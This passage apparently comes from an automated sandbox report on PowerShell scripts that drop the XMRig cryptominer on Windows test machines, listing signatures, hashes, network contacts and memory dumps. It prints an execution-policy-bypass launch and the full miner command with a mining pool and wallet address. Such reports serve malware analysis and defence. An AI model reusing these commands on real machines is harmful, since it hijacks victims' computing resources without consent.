memory/4032-90-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-91-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-92-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-93-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-94-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-95-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-96-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-97-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-98-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-99-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-100-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-101-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-102-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-103-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-104-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-105-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-106-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-107-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-108-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-109-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-110-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-111-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-112-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-113-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-114-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-115-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-116-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-117-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win7-20240508-en
Max time kernel
1561s
Max time network
1562s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
Network
Files
memory/2408-4-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp
memory/2408-5-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2408-6-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/2408-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-7-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-9-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-10-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win11-20240426-en
Max time kernel
1800s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3352 wrote to memory of 3632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3352 wrote to memory of 3632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 13.107.21.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3352-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfpm2l34.31v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-6-0x00000201CB160000-0x00000201CB182000-memory.dmp
memory/3352-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-14-0x00000201CB340000-0x00000201CB352000-memory.dmp
memory/3352-15-0x00000201CB330000-0x00000201CB33A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3632-46-0x0000024752BF0000-0x0000024752C10000-memory.dmp
memory/3632-47-0x0000024752C50000-0x0000024752C70000-memory.dmp
memory/3632-48-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3352-49-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3632-51-0x0000024752C70000-0x0000024752C90000-memory.dmp
memory/3632-52-0x0000024752C90000-0x0000024752CB0000-memory.dmp
memory/3352-50-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3632-53-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-54-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-55-0x0000024752C70000-0x0000024752C90000-memory.dmp
memory/3632-56-0x0000024752C90000-0x0000024752CB0000-memory.dmp
memory/3632-57-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-58-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-59-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-60-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-61-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-62-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-63-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-64-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-65-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-66-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-67-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-68-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-69-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-70-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-71-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-72-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-73-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-74-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-75-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-76-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-77-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-78-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-79-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-80-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-81-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-82-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-83-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-84-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-85-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-86-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-87-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-88-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-89-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-90-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-91-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-92-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-93-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-94-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-95-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-96-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-97-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-98-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-99-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-100-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-101-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-102-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-103-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-104-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-105-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-106-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-107-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-108-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-109-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-110-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-111-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-112-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-113-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-114-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-115-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-116-0x00007FF763560000-0x00007FF764193000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3780 wrote to memory of 2544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3780 wrote to memory of 2544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/3780-3-0x00007FF8922E3000-0x00007FF8922E4000-memory.dmp
memory/3780-5-0x0000017F63790000-0x0000017F637B2000-memory.dmp
memory/3780-7-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-10-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1kqnk5c.wet.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3780-9-0x0000017F7BE00000-0x0000017F7BE76000-memory.dmp
memory/3780-25-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-48-0x0000017F7BD80000-0x0000017F7BD92000-memory.dmp
memory/3780-61-0x0000017F7BC40000-0x0000017F7BC4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2544-90-0x0000019F141D0000-0x0000019F141F0000-memory.dmp
memory/3780-91-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-92-0x00007FF8922E3000-0x00007FF8922E4000-memory.dmp
memory/3780-94-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/2544-93-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-95-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-96-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-97-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-98-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-99-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-100-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-101-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-102-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-103-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-104-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-105-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-106-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-107-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-108-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-109-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-110-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-111-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-112-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-113-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-114-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-115-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-116-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-117-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-118-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-119-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-120-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-121-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-122-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-123-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-124-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-125-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-126-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-127-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-128-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-129-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-130-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-131-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-132-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-133-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-134-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-135-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-136-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-137-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-138-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-139-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-140-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-141-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-142-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-143-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-144-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-145-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-146-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-147-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-148-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-149-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-150-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-151-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-152-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-153-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-154-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-155-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-156-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:20
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
